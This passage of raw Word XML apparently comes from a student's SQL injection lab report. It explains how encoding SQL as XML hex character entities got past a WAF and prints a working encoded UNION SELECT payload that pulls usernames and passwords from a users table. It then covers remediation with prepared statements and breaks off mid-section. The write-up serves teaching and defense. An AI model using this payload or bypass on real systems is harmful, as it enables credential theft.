    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bypass Methodology:</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> While the WAF inspected the raw body text, the backend application routed the request to an XML parser before executing the database query. By encoding the SQL payload using XML hexadecimal character entities, the WAF signatures were bypassed:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Standard string </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>UNION SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> converts to:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&amp;#x55;&amp;#x4e;&amp;#x49;&amp;#x4f;&amp;#x4e;&amp;#x20;&amp;#x53;&amp;#x45;&amp;#x4c;&amp;#x45;&amp;#x43;&amp;#x54;</w:t>
      </w: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Default="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Exploit Payload Injected into </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&lt;storeId&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="ng-tns-c507410133-75"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-tag"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-name"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>stockCheck</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tag"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-name"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>productId</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-tag"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-tag"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-name"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>productId</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tag"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-name"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>storeId</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-tag"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-symbol"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&amp;#x55;&amp;#x4e;&amp;#x49;&amp;#x4f;&amp;#x4e;&amp;#x20;&amp;#x53;&amp;#x45;&amp;#x4c;&amp;#x45;&amp;#x43;&amp;#x54;&amp;#x20;&amp;#x75;&amp;#x73;&amp;#x65;&amp;#x72;&amp;#x6e;&amp;#x61;&amp;#x6d;&amp;#x65;&amp;#x7c;&amp;#x7c;&amp;#x27;&amp;#x7e;&amp;#x27;&amp;#x7c;&amp;#x7c;&amp;#x70;&amp;#x61;&amp;#x73;&amp;#x73;&amp;#x77;&amp;#x6f;&amp;#x72;&amp;#x64;&amp;#x20;&amp;#x46;&amp;#x52;&amp;#x4f;&amp;#x4d;&amp;#x20;&amp;#x75;&amp;#x73;&amp;#x65;&amp;#x72;&amp;#x73;</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-tag"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-name"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>storeId</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-tag"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-tag"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-name"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>stockCheck</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-tag"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> The WAF passed the unflagged XML string to the application. The backend XML parser expanded the entities back into raw SQL instructions and appended the </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> table records to the stock output, yielding the administrator password and solving the lab. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F73B1" w:rsidRDefault="007F73B1" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="007F73B1" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F73B1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5. Security Artifacts &amp; Evidence Mapping</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>All practical laboratory evidence has been systematically archived in the Phase 1 submission folder structure according</w:t>
      </w:r>
      <w:r w:rsidR="007F73B1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to IqraSec Academy guidelines.</w:t>
      </w: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817D5D" w:rsidRPr="007F73B1" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F73B1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>6. Comprehensive Remediation &amp; Defensive Engineering</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediating SQL injection requires establishing a clear separation between code interpretation and untrusted data handling. Relying solely on input blacklists, character filtering, or perimeter firewalls leaves applications vulnerable to alternative encodings and parsing discrepancies. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="007F73B1" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F73B1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6.1 The Primary Defense: Parameterized Queries (Prepared Statements)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The definitive remediation for all SQL injection variants is the mandatory use of </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Parameterized Queries</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (also known as Prepared Statements).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Why Prepared Statements Work</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">In dynamic SQL concatenation, the database compiles the query </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>after</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the user input has been appended, allowing injected characters to alter the execution logic.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>With prepared statements, query compilation occurs in two distinct phases:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Compilation Phase:</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> The application sends the parameterized SQL statement template to the database engine:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="ng-tns-c507410133-76"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SQL</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SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>FROM</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> products </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> category </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ? </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>AND</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> released </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The database parses the statement, generates the execution plan, and fixes the Abstract Syntax Tree (AST). The placeholder </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> defines an explicit data slot.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Execution Phase:</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> The application binds the user-supplied input directly to the placeholder parameter:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="ng-tns-c507410133-77"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Java</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pstmt.setString(</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, userSuppliedCategory);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The database engine inserts the input directly into the designated data slot. Even if the input contains SQL control characters like </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>' UNION SELECT ... --</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, they </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>are treated strictly as string literals, completely preventing alterations to the query structure.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Secure Code Implementations Across Languages</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
